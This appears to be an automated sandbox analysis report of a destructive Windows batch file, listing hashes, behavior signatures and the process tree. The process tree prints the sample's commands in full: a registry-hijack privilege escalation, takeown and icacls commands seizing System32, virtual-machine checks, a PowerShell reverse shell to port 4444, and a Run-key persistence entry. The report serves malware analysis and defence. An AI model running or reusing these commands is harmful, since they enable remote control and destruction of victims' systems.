Analysis

  • max time kernel
    110s
  • max time network
    206s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    08/09/2024, 06:47

General

  • Target

    custom.bat

  • Size

    4KB

  • MD5

    1c63745d54962d205bb3ae879bea1ed4

  • SHA1

    a832c894a4e2b6d486c48b9ea6ec79d94df9537e

  • SHA256

    396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

  • SHA512

    129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39

  • SSDEEP

    96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Gathers system information 1 TTPs 3 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4088
    • C:\Windows\system32\mode.com
      mode con: cols=800 lines=60
      2⤵
      PID:1084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1148
    • C:\Windows\system32\timeout.exe
      timeout /t 5
      2⤵
      • Delays execution with timeout.exe
      PID:992
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
      2⤵
      • Modifies registry class
      PID:2660
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4872
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\* /r /d y
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1344
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\* /grant Admin:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1296
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers\* /grant Admin:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:636
      • C:\Windows\system32\mode.com
        mode con: cols=800 lines=60
        3⤵
        PID:2360
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3008
    • C:\Windows\system32\timeout.exe
      timeout /t 5
      2⤵
      • Delays execution with timeout.exe
      PID:3068
    • C:\Windows\system32\reg.exe
      reg delete "HKCU\Software\Classes\mscfile" /f
      2⤵
      • Modifies registry class
      PID:4508
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:1400
    • C:\Windows\system32\findstr.exe
      findstr /i "VirtualBox"
      2⤵
      PID:1664
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:2548
    • C:\Windows\system32\findstr.exe
      findstr /i "VMware"
      2⤵
      PID:1128
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:1836
    • C:\Windows\system32\findstr.exe
      findstr /i "Hyper-V"
      2⤵
      PID:3820
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:464
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
      2⤵
      • Adds Run key to start application
      PID:3508
    • C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\* /r /d y
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • Suspicious use of AdjustPrivilegeToken
      PID:3972

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    a2b24af1492f112d2e53cb7415fda39f

    SHA1

    dbfcee57242a14b60997bd03379cc60198976d85

    SHA256

    fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

    SHA512

    9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    948B

    MD5

    310c4040e72365ea4993113fd77611ce

    SHA1

    3dbdc46110454c95ef61e3e88d0e8cb7f90ea5a6

    SHA256

    11223ab7bdbe8d600e56b0d681f1c5109b7a8bd1bdf03a16975c8e77a8dd131f

    SHA512

    deae0c82677b8202d26faa751eeeac868050745d3aedc1ac297d13d6b92ce434e8d5c620eb39b8f87647ba0b9a8f46b89a14b664f6f9a58c5c03834c5afc5bee

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zg5jojtw.ckz.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

    Filesize

    285B

    MD5

    4577f08330df24a350ff523ec87bf38e

    SHA1

    5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

    SHA256

    5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

    SHA512

    ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

  • memory/1148-0-0x00007FF80A7A3000-0x00007FF80A7A5000-memory.dmp

    Filesize

    8KB

  • memory/1148-6-0x0000020EDC8B0000-0x0000020EDC8D2000-memory.dmp

    Filesize

    136KB

  • memory/1148-11-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

    Filesize

    10.8MB

  • memory/1148-12-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

    Filesize

    10.8MB

  • memory/1148-15-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

    Filesize

    10.8MB